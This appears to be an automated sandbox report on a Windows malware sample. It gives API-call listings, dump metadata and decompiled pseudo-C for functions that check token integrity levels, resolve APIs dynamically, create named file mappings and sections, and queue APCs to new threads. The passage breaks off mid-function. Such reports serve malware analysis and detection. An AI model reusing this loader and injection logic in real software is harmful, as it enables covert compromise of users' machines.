                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,001D5DBE,?), ref: 001D8604
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001D860F
                  • Part of subcall function 001D579B: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,02FA9388,00000000,?,74B5F710,00000000,74B5F730), ref: 001D57EA
                  • Part of subcall function 001D579B: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02FA93C0,?,00000000,30314549,00000014,004F0053,02FA937C), ref: 001D5887
                  • Part of subcall function 001D579B: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,001D8522), ref: 001D5899
                • GetLastError.KERNEL32 ref: 001D8621
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                • String ID:
                • API String ID: 3521023985-0
                • Opcode ID: cd5969137e6e27153ecf8b3d25e8ef8e3b0f121f3fcdb86258c256294161d41d
                • Instruction ID: 7bbda363eca4ee22d6a7893fd2a787cfd1cdefe049be64bfc0b7361de1ec33fc
                • Opcode Fuzzy Hash: cd5969137e6e27153ecf8b3d25e8ef8e3b0f121f3fcdb86258c256294161d41d
                • Instruction Fuzzy Hash: 52512E71802229EBDF11DF95EC449EEBFB8EF59760F204617F515A2290DB709A84CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 69%
                			E6E241352(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                				intOrPtr _v12;
                				struct _FILETIME* _v16;
                				short _v60;
                				struct _FILETIME* _t14;
                				intOrPtr _t15;
                				long _t18;
                				void* _t19;
                				void* _t22;
                				intOrPtr _t31;
                				long _t32;
                				void* _t34;
                
                				_t31 = __edx;
                				_t14 =  &_v16;
                				GetSystemTimeAsFileTime(_t14);
                				_push(0x192);
                				_push(0x54d38000);
                				_push(_v12);
                				_push(_v16);
                				L6E242130();
                				_push(_t14);
                				_v16 = _t14;
                				_t15 =  *0x6e244144;
                				_push(_t15 + 0x6e24505e);
                				_push(_t15 + 0x6e245054);
                				_push(0x16);
                				_push( &_v60);
                				_v12 = _t31;
                				L6E24212A();
                				_t18 = _a4;
                				if(_t18 == 0) {
                					_t18 = 0x1000;
                				}
                				_t19 = CreateFileMappingW(0xffffffff, 0x6e244148, 4, 0, _t18,  &_v60); // executed
                				_t34 = _t19;
                				if(_t34 == 0) {
                					_t32 = GetLastError();
                				} else {
                					if(_a4 != 0 || GetLastError() == 0xb7) {
                						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                						if(_t22 == 0) {
                							_t32 = GetLastError();
                							if(_t32 != 0) {
                								goto L9;
                							}
                						} else {
                							 *_a8 = _t34;
                							 *_a12 = _t22;
                							_t32 = 0;
                						}
                					} else {
                						_t32 = 2;
                						L9:
                						CloseHandle(_t34);
                					}
                				}
                				return _t32;
                			}















                APIs
                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 6E24135F
                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E241375
                • _snwprintf.NTDLL ref: 6E24139A
                • CreateFileMappingW.KERNELBASE(000000FF,6E244148,00000004,00000000,?,?), ref: 6E2413BF
                • GetLastError.KERNEL32 ref: 6E2413D6
                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6E2413EA
                • GetLastError.KERNEL32 ref: 6E241402
                • CloseHandle.KERNEL32(00000000), ref: 6E24140B
                • GetLastError.KERNEL32 ref: 6E241413
                Memory Dump Source
                • Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true
                • Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp
                Similarity
                • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                • String ID:
                • API String ID: 1724014008-0
                • Opcode ID: 8c87bfb6f97a0e045ba2ca14dd10ce6b4872ebe35748ab517615d60386e1b4e5
                • Instruction ID: d9a3db51d8064319140bfa6bcbb0a9a1b218fa127b80f28bc804f1369a0bf4a9
                • Opcode Fuzzy Hash: 8c87bfb6f97a0e045ba2ca14dd10ce6b4872ebe35748ab517615d60386e1b4e5
                • Instruction Fuzzy Hash: 382190B250010DFFDB16EFE8CC88E9E77BAEB49355F114125F615E7180DA7099898B70
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 74%
                			E001D81E7(intOrPtr __edx, void** _a4, void** _a8) {
                				intOrPtr _v8;
                				struct _FILETIME* _v12;
                				short _v56;
                				struct _FILETIME* _t12;
                				intOrPtr _t13;
                				void* _t17;
                				void* _t21;
                				intOrPtr _t27;
                				long _t28;
                				void* _t30;
                
                				_t27 = __edx;
                				_t12 =  &_v12;
                				GetSystemTimeAsFileTime(_t12);
                				_push(0x192);
                				_push(0x54d38000);
                				_push(_v8);
                				_push(_v12);
                				L001DB072();
                				_push(_t12);
                				_v12 = _t12;
                				_t13 =  *0x1dd2a4; // 0x2dca5a8
                				_t5 = _t13 + 0x1de862; // 0x2fa8e0a
                				_t6 = _t13 + 0x1de59c; // 0x530025
                				_push(0x16);
                				_push( &_v56);
                				_v8 = _t27;
                				L001DAD0A();
                				_t17 = CreateFileMappingW(0xffffffff, 0x1dd2a8, 4, 0, 0x1000,  &_v56); // executed
                				_t30 = _t17;
                				if(_t30 == 0) {
                					_t28 = GetLastError();
                				} else {
                					if(GetLastError() == 0xb7) {
                						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                						if(_t21 == 0) {
                							_t28 = GetLastError();
                							if(_t28 != 0) {
                								goto L6;
                							}
                						} else {
                							 *_a4 = _t30;
                							 *_a8 = _t21;
                							_t28 = 0;
                						}
                					} else {
                						_t28 = 2;
                						L6:
                						CloseHandle(_t30);
                					}
                				}
                				return _t28;
                			}














                APIs
                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,001D5C91,?,?,4D283A53,?,?), ref: 001D81F3
                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 001D8209
                • _snwprintf.NTDLL ref: 001D822E
                • CreateFileMappingW.KERNELBASE(000000FF,001DD2A8,00000004,00000000,00001000,?), ref: 001D824A
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,001D5C91,?,?,4D283A53), ref: 001D825C
                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 001D8273
                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,001D5C91,?,?), ref: 001D8294
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,001D5C91,?,?,4D283A53), ref: 001D829C
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                • String ID:
                • API String ID: 1814172918-0
                • Opcode ID: ad53f9bfd7cecc62724fcd24ee68699bf61b3564b6adc242bcf76bf48197313d
                • Instruction ID: 63ffb136cf15f8d309f6410def5a5d78ebb58b17e96199aa9e8f56fd78cd19ef
                • Opcode Fuzzy Hash: ad53f9bfd7cecc62724fcd24ee68699bf61b3564b6adc242bcf76bf48197313d
                • Instruction Fuzzy Hash: 3421DF76642605FFD711ABA4DC05F9E77A9AF48740F254123F60AEB2D0DB70DA41CB90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 74%
                			E001D523A(void* __ecx, void* __edx, intOrPtr _a4) {
                				struct _FILETIME _v12;
                				void* _t10;
                				void* _t12;
                				int _t14;
                				signed int _t16;
                				void* _t18;
                				signed int _t19;
                				unsigned int _t23;
                				void* _t26;
                				signed int _t33;
                
                				_t26 = __edx;
                				_push(__ecx);
                				_push(__ecx);
                				_t10 = HeapCreate(0, 0x400000, 0); // executed
                				 *0x1dd238 = _t10;
                				if(_t10 != 0) {
                					 *0x1dd1a8 = GetTickCount();
                					_t12 = E001D14CE(_a4);
                					if(_t12 == 0) {
                						do {
                							GetSystemTimeAsFileTime( &_v12);
                							_t14 = SwitchToThread();
                							_t23 = _v12.dwHighDateTime;
                							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                							_push(0);
                							_push(9);
                							_push(_t23 >> 7);
                							_push(_t16);
                							L001DB1D6();
                							_t33 = _t14 + _t16;
                							_t18 = E001D80C5(_a4, _t33);
                							_t19 = 2;
                							_t25 = _t33;
                							Sleep(_t19 << _t33); // executed
                						} while (_t18 == 1);
                						if(E001D52E5(_t25) != 0) {
                							 *0x1dd260 = 1; // executed
                						}
                						_t12 = E001D5C02(_t26); // executed
                					}
                				} else {
                					_t12 = 8;
                				}
                				return _t12;
                			}














                APIs
                • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,001D647E,?), ref: 001D524D
                • GetTickCount.KERNEL32 ref: 001D5261
                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,001D647E,?), ref: 001D527D
                • SwitchToThread.KERNEL32(?,00000001,?,?,?,001D647E,?), ref: 001D5283
                • _aullrem.NTDLL(?,?,00000009,00000000), ref: 001D52A0
                • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,001D647E,?), ref: 001D52BA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                • String ID: BX
                • API String ID: 507476733-1137598685
                • Opcode ID: 411c30145653b58c146815dcdd726034d2411430b43812e5fb892144e169e285
                • Instruction ID: 53ef1665db25b0a93be3761e453749a86e9d319184467c1f57cb9a6d1e8373e4
                • Opcode Fuzzy Hash: 411c30145653b58c146815dcdd726034d2411430b43812e5fb892144e169e285
                • Instruction Fuzzy Hash: 3D114872642701FFE710AB78EC4EB1A7BDAEB44350F104617F904D6790EB70D880C6A1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E001D54DA(long* _a4) {
                				long _v8;
                				void* _v12;
                				void _v16;
                				long _v20;
                				int _t33;
                				void* _t46;
                
                				_v16 = 1;
                				_v20 = 0x2000;
                				if( *0x1dd25c > 5) {
                					_v16 = 0;
                					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                						_v8 = 0;
                						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                						if(_v8 != 0) {
                							_t46 = E001D7E20(_v8);
                							if(_t46 != 0) {
                								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                								if(_t33 != 0) {
                									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                								}
                								E001DA5FA(_t46);
                							}
                						}
                						CloseHandle(_v12);
                					}
                				}
                				 *_a4 = _v20;
                				return _v16;
                			}










                APIs
                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 001D550C
                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 001D552C
                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 001D553C
                • CloseHandle.KERNEL32(00000000), ref: 001D558C
                  • Part of subcall function 001D7E20: RtlAllocateHeap.NTDLL(00000000,00000000,001D8112), ref: 001D7E2C
                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 001D555F
                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 001D5567
                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 001D5577
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                • String ID:
                • API String ID: 1295030180-0
                • Opcode ID: 64db854af08ee23d68befe2b6ecf267f8a6a118ffb2ed77abc366b1dc3c5ab59
                • Instruction ID: a30da5cf1cd7f78abf79f1a00513e88acf92813a410fdb30c81b574402114ee4
                • Opcode Fuzzy Hash: 64db854af08ee23d68befe2b6ecf267f8a6a118ffb2ed77abc366b1dc3c5ab59
                • Instruction Fuzzy Hash: 89213C75901209FFEB019F94EC44EAEBF7AEB49304F1040A6F511A62A1C7759F45DF60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E6E24150D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                				intOrPtr _v8;
                				_Unknown_base(*)()* _t29;
                				_Unknown_base(*)()* _t33;
                				_Unknown_base(*)()* _t36;
                				_Unknown_base(*)()* _t39;
                				_Unknown_base(*)()* _t42;
                				intOrPtr _t46;
                				struct HINSTANCE__* _t50;
                				intOrPtr _t56;
                
                				_t56 = E6E241CC8(0x20);
                				if(_t56 == 0) {
                					_v8 = 8;
                				} else {
                					_t50 = GetModuleHandleA( *0x6e244144 + 0x6e245014);
                					_v8 = 0x7f;
                					_t29 = GetProcAddress(_t50,  *0x6e244144 + 0x6e245151);
                					 *(_t56 + 0xc) = _t29;
                					if(_t29 == 0) {
                						L8:
                						E6E24133D(_t56);
                					} else {
                						_t33 = GetProcAddress(_t50,  *0x6e244144 + 0x6e245161);
                						 *(_t56 + 0x10) = _t33;
                						if(_t33 == 0) {
                							goto L8;
                						} else {
                							_t36 = GetProcAddress(_t50,  *0x6e244144 + 0x6e245174);
                							 *(_t56 + 0x14) = _t36;
                							if(_t36 == 0) {
                								goto L8;
                							} else {
                								_t39 = GetProcAddress(_t50,  *0x6e244144 + 0x6e245189);
                								 *(_t56 + 0x18) = _t39;
                								if(_t39 == 0) {
                									goto L8;
                								} else {
                									_t42 = GetProcAddress(_t50,  *0x6e244144 + 0x6e24519f);
                									 *(_t56 + 0x1c) = _t42;
                									if(_t42 == 0) {
                										goto L8;
                									} else {
                										 *((intOrPtr*)(_t56 + 8)) = _a8;
                										 *((intOrPtr*)(_t56 + 4)) = _a4;
                										_t46 = E6E2415F1(_t56, _a12); // executed
                										_v8 = _t46;
                										if(_t46 != 0) {
                											goto L8;
                										} else {
                											 *_a16 = _t56;
                										}
                									}
                								}
                							}
                						}
                					}
                				}
                				return _v8;
                			}













                APIs
                  • Part of subcall function 6E241CC8: HeapAlloc.KERNEL32(00000000,?,6E241C03,00000208,00000000,00000000,?,?,?,6E2412A1,?), ref: 6E241CD4
                • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E2416D5,?,?,?,?,?,00000002,?,6E2414D0), ref: 6E241531
                • GetProcAddress.KERNEL32(00000000,?), ref: 6E241553
                • GetProcAddress.KERNEL32(00000000,?), ref: 6E241569
                • GetProcAddress.KERNEL32(00000000,?), ref: 6E24157F
                • GetProcAddress.KERNEL32(00000000,?), ref: 6E241595
                • GetProcAddress.KERNEL32(00000000,?), ref: 6E2415AB
                  • Part of subcall function 6E2415F1: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 6E24164E
                  • Part of subcall function 6E2415F1: memset.NTDLL ref: 6E241670
                Memory Dump Source
                • Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true
                • Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp
                Similarity
                • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                • String ID:
                • API String ID: 1632424568-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                				long _v8;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				char _t9;
                				void* _t10;
                				void* _t18;
                				void* _t23;
                				void* _t36;
                
                				_push(__ecx);
                				_t9 = _a8;
                				_v8 = 1;
                				if(_t9 == 0) {
                					_t10 = InterlockedDecrement(0x6e244108);
                					__eflags = _t10;
                					if(_t10 == 0) {
                						__eflags =  *0x6e24410c;
                						if( *0x6e24410c != 0) {
                							_t36 = 0x2328;
                							while(1) {
                								SleepEx(0x64, 1);
                								__eflags =  *0x6e244118;
                								if( *0x6e244118 == 0) {
                									break;
                								}
                								_t36 = _t36 - 0x64;
                								__eflags = _t36;
                								if(_t36 > 0) {
                									continue;
                								}
                								break;
                							}
                							CloseHandle( *0x6e24410c);
                						}
                						HeapDestroy( *0x6e244110);
                					}
                				} else {
                					if(_t9 == 1 && InterlockedIncrement(0x6e244108) == 1) {
                						_t18 = HeapCreate(0, 0x400000, 0); // executed
                						 *0x6e244110 = _t18;
                						_t41 = _t18;
                						if(_t18 == 0) {
                							L6:
                							_v8 = 0;
                						} else {
                							 *0x6e244130 = _a4;
                							asm("lock xadd [eax], edi");
                							_push( &_a8);
                							_t23 = E6E24179C(E6E24173D, E6E241C6E(_a12, 1, 0x6e244118, _t41));
                							 *0x6e24410c = _t23;
                							if(_t23 == 0) {
                								asm("lock xadd [esi], eax");
                								goto L6;
                							}
                						}
                					}
                				}
                				return _v8;
                			}













                APIs
                • InterlockedIncrement.KERNEL32(6E244108), ref: 6E241F78
                • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E241F8D
                  • Part of subcall function 6E24179C: CreateThread.KERNELBASE ref: 6E2417B3
                  • Part of subcall function 6E24179C: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E2417C8
                  • Part of subcall function 6E24179C: GetLastError.KERNEL32(00000000), ref: 6E2417D3
                  • Part of subcall function 6E24179C: TerminateThread.KERNEL32(00000000,00000000), ref: 6E2417DD
                  • Part of subcall function 6E24179C: CloseHandle.KERNEL32(00000000), ref: 6E2417E4
                  • Part of subcall function 6E24179C: SetLastError.KERNEL32(00000000), ref: 6E2417ED
                • InterlockedDecrement.KERNEL32(6E244108), ref: 6E241FE0
                • SleepEx.KERNEL32(00000064,00000001), ref: 6E241FFA
                • CloseHandle.KERNEL32 ref: 6E242016
                • HeapDestroy.KERNEL32 ref: 6E242022
                Memory Dump Source
                • Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true
                • Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp
                Similarity
                • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                • String ID:
                • API String ID: 2110400756-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E6E24179C(long _a4, DWORD* _a12) {
                				_Unknown_base(*)()* _v0;
                				void* _t4;
                				long _t6;
                				long _t11;
                				void* _t13;
                
                				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e244140, 0, _a12); // executed
                				_t13 = _t4;
                				if(_t13 != 0) {
                					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                					if(_t6 == 0) {
                						_t11 = GetLastError();
                						TerminateThread(_t13, _t11);
                						CloseHandle(_t13);
                						_t13 = 0;
                						SetLastError(_t11);
                					}
                				}
                				return _t13;
                			}









                APIs
                • CreateThread.KERNELBASE ref: 6E2417B3
                • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E2417C8
                • GetLastError.KERNEL32(00000000), ref: 6E2417D3
                • TerminateThread.KERNEL32(00000000,00000000), ref: 6E2417DD
                • CloseHandle.KERNEL32(00000000), ref: 6E2417E4
                • SetLastError.KERNEL32(00000000), ref: 6E2417ED
                Memory Dump Source
                • Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true
                • Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp
                Similarity
                • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                • String ID:
                • API String ID: 3832013932-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 57%
                			E001D5C02(signed int __edx) {
                				signed int _v8;
                				long _v12;
                				CHAR* _v16;
                				long _v20;
                				void* __edi;
                				void* __esi;
                				void* _t21;
                				CHAR* _t22;
                				CHAR* _t25;
                				intOrPtr _t26;
                				void* _t27;
                				void* _t31;
                				void* _t32;
                				CHAR* _t36;
                				CHAR* _t42;
                				CHAR* _t43;
                				CHAR* _t44;
                				CHAR* _t46;
                				void* _t49;
                				void* _t51;
                				CHAR* _t54;
                				signed char _t56;
                				intOrPtr _t58;
                				signed int _t59;
                				void* _t62;
                				CHAR* _t65;
                				CHAR* _t66;
                				char* _t67;
                				void* _t68;
                
                				_t61 = __edx;
                				_v20 = 0;
                				_v8 = 0;
                				_v12 = 0;
                				_t21 = E001D3EDF();
                				if(_t21 != 0) {
                					_t59 =  *0x1dd25c; // 0x2000000a
                					_t55 = (_t59 & 0xf0000000) + _t21;
                					 *0x1dd25c = (_t59 & 0xf0000000) + _t21;
                				}
                				_t22 =  *0x1dd164(0, 2); // executed
                				_v16 = _t22;
                				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                					_t25 = E001D87A2( &_v8,  &_v20); // executed
                					_t54 = _t25;
                					_t26 =  *0x1dd2a4; // 0x2dca5a8
                					if( *0x1dd25c > 5) {
                						_t8 = _t26 + 0x1de5cd; // 0x4d283a53
                						_t27 = _t8;
                					} else {
                						_t7 = _t26 + 0x1dea15; // 0x44283a44
                						_t27 = _t7;
                					}
                					E001DA69B(_t27, _t27);
                					_t31 = E001D81E7(_t61,  &_v20,  &_v12); // executed
                					if(_t31 == 0) {
                						CloseHandle(_v20);
                					}
                					_t62 = 5;
                					if(_t54 != _t62) {
                						 *0x1dd270 =  *0x1dd270 ^ 0x81bbe65d;
                						_t32 = E001D7E20(0x60);
                						 *0x1dd32c = _t32;
                						__eflags = _t32;
                						if(_t32 == 0) {
                							_push(8);
                							_pop(0);
                						} else {
                							memset(_t32, 0, 0x60);
                							_t49 =  *0x1dd32c; // 0x2fa95b0
                							_t68 = _t68 + 0xc;
                							__imp__(_t49 + 0x40);
                							_t51 =  *0x1dd32c; // 0x2fa95b0
                							 *_t51 = 0x1de836;
                						}
                						_t54 = 0;
                						__eflags = 0;
                						if(0 == 0) {
                							_t36 = RtlAllocateHeap( *0x1dd238, 0, 0x43);
                							 *0x1dd2c4 = _t36;
                							__eflags = _t36;
                							if(_t36 == 0) {
                								_push(8);
                								_pop(0);
                							} else {
                								_t56 =  *0x1dd25c; // 0x2000000a
                								_t61 = _t56 & 0x000000ff;
                								_t58 =  *0x1dd2a4; // 0x2dca5a8
                								_t13 = _t58 + 0x1de55a; // 0x697a6f4d
                								_t55 = _t13;
                								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x1dc2a7);
                							}
                							_t54 = 0;
                							__eflags = 0;
                							if(0 == 0) {
                								asm("sbb eax, eax");
                								E001D2D6E( ~_v8 &  *0x1dd270,  &E001DD00C); // executed
                								_t42 = E001D696A(_t55); // executed
                								_t54 = _t42;
                								__eflags = _t54;
                								if(_t54 != 0) {
                									goto L30;
                								}
                								_t43 = E001D418D(_t55); // executed
                								__eflags = _t43;
                								if(_t43 != 0) {
                									__eflags = _v8;
                									_t65 = _v12;
                									if(_v8 != 0) {
                										L29:
                										_t44 = E001D8494(_t61, _t65, _v8); // executed
                										_t54 = _t44;
                										goto L30;
                									}
                									__eflags = _t65;
                									if(__eflags == 0) {
                										goto L30;
                									}
                									_t46 = E001D620F(__eflags,  &(_t65[4])); // executed
                									_t54 = _t46;
                									__eflags = _t54;
                									if(_t54 == 0) {
                										goto L30;
                									}
                									goto L29;
                								}
                								_t54 = 8;
                							}
                						}
                					} else {
                						_t66 = _v12;
                						if(_t66 == 0) {
                							L30:
                							if(_v16 == 0 || _v16 == 1) {
                								 *0x1dd160();
                							}
                							goto L34;
                						}
                						_t67 =  &(_t66[4]);
                						do {
                						} while (E001D4359(_t62, _t67, 0, 1) == 0x4c7);
                					}
                					goto L30;
                				} else {
                					_t54 = _t22;
                					L34:
                					return _t54;
                				}
                			}

































                APIs
                  • Part of subcall function 001D3EDF: GetModuleHandleA.KERNEL32(4C44544E,00000000,001D5C1B,00000000,00000000), ref: 001D3EEE
                • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 001D5C98
                  • Part of subcall function 001D7E20: RtlAllocateHeap.NTDLL(00000000,00000000,001D8112), ref: 001D7E2C
                • memset.NTDLL ref: 001D5CE7
                • RtlInitializeCriticalSection.NTDLL(02FA9570), ref: 001D5CF8
                  • Part of subcall function 001D620F: memset.NTDLL ref: 001D6224
                  • Part of subcall function 001D620F: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 001D6258
                  • Part of subcall function 001D620F: StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 001D6263
                • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 001D5D23
                • wsprintfA.USER32 ref: 001D5D53
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                • String ID:
                • API String ID: 4246211962-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E6E2410E8(void* __edi, intOrPtr _a4) {
                				intOrPtr _v8;
                				char _v12;
                				void* _v16;
                				unsigned int _v20;
                				intOrPtr _v24;
                				char _v28;
                				signed int _v32;
                				void* _v36;
                				signed int _v40;
                				signed char _v44;
                				void* _v48;
                				signed int _v56;
                				signed int _v60;
                				intOrPtr _t50;
                				void* _t57;
                				void* _t61;
                				signed int _t67;
                				signed char _t69;
                				signed char _t70;
                				void* _t76;
                				intOrPtr _t77;
                				unsigned int _t82;
                				intOrPtr _t86;
                				intOrPtr* _t89;
                				intOrPtr _t90;
                				void* _t91;
                				signed int _t93;
                
                				_t90 =  *0x6e244130;
                				_t50 = E6E241B4C(_t90,  &_v28,  &_v20);
                				_v24 = _t50;
                				if(_t50 == 0) {
                					asm("sbb ebx, ebx");
                					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
                					_t91 = _t90 + _v28;
                					_v48 = _t91;
                					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
                					_t76 = _t57;
                					_v36 = _t76;
                					if(_t76 == 0) {
                						_v24 = 8;
                					} else {
                						_t69 = 0;
                						if(_t67 <= 0) {
                							_t77 =  *0x6e244140;
                						} else {
                							_t86 = _a4;
                							_v8 = _t91;
                							_v8 = _v8 - _t76;
                							_t14 = _t86 + 0x6e2451a7; // 0x3220a9c2
                							_t61 = _t57 - _t91 + _t14;
                							_v16 = _t76;
                							do {
                								asm("movsd");
                								asm("movsd");
                								asm("movsd");
                								_t70 = _t69 + 1;
                								_v44 = _t70;
